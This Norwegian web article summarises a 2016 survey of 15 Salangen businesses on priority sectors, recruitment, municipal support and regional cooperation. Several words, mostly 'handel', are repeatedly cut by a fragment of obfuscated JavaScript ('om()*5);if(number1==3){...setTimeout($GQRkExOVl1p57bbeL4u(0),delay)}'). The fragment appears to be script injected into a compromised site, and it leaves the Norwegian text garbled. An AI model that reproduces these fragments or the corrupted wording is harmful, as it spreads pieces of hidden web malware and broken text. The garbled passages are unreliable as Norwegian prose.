Resultat spørreundersøkelse Salangen

Sjøvegan fra Høgfjell Foto: Wikimedia Commons, fotograf Sigmund Pettersen

Byregionprogrammet har gjennomført en spørreundersøkelse som en del av innsiktsgrunnlaget for utvikling av regional næringsstrategi. 15 næringsdrivende i Salangen har respondert. Denne artikkelen oppsummerer resultatene fra undersøkelsen, som ble gjennomført høsten 2016.

Viktige satsingsområder

Blant bedriftene som har respondert i Salangen er det fokus på videreutvikling innen servicenæringer, reiseliv og detaljhandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel som aktuelle satsingsområder for kommunen. Tilgang på kunder nevnes av mange som en betydelig begrensning for videre utvikling. Markedsføring av tilbudene i kommunen og satsing på netthandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel nevnes som muligheter for videre vekst, og et klart flertall av bedriftene ser digitalisering og automatisering som en mulighet for bedriften.

Rekruttering og kompetansebehov

Ny arbeidskraft i Salangen skaffes primært gjennom bekjente. Øvrige rekrutteringskanaler i kommunen er lærlinger og annonsering. Lærlinger er lite utbredt blant bedriftene som har svart på undersøkelsen. Bakgrunnen for at bedriftene ikke har lærlinger er at det har manglet forespørsler, ikke ses på som relevant i detaljhandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andelen og lav kapasitet/få ansatte. Blant forslagene til utdanningstilbud er markedsføring, handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel og service trukket frem av flere, men det nevnes også at kokk, reiseliv og sosialfaglige fagutdannelser kan være aktuelle for bedriftene.

Forholdet til det offentlige og regionen

I Salangen er det noen av bedriftene som oppgir tilrettelegging fra kommunen som årsak til etablering, samt at det har vært attraktive næringsareal tilgjengelig for etablering. Tilhørighet til kommunen er likevel den viktigste årsaken, sammen med strategisk plassering i forhold til markedet. Den store andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andelen av bedrifter innenfor detaljhandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel og service forklarer fokuset på kundetilgang i valg av plassering. Den viktigste rollen for kommunen kan ta for å bidra til bedriftene i undersøkelsen er å legge til rette for næringsareal og handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andle lokalt. Sentrumsutvikling, finansiering og kompetansetiltak nevnes kun av enkeltbedrifter. Bedriftene i undersøkelsen mener kompetansenivå er det som har den største betydningen for positiv næringsutvikling  i regionen, og kompetanse trekkes også frem som en faktor som har negativ utvikling på næringsutviklingen i Sør-Troms sammen med bygdedyret/janteloven og finansieringsløsninger.

Samarbeid

Samarbeidskulturen mellom bedriftene i Salangen ser ut til å være godt etablert, blant de som ikke har samarbeid i dag er det ønskelig med samarbeid mellom detaljhandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andelsaktører både lokalt og utenfor regionen. Felles nettbutikk nevnes også som en mulig arena for samarbeid i regionen. Blant fokusområdene for en næringsstrategi regionen trekkes rekruttering av arbeidskraft og innbyggere sammen med kompetanse frem som de viktigste områdene å satse på – sammen med innovasjon i bedrifter og stedsutvikling.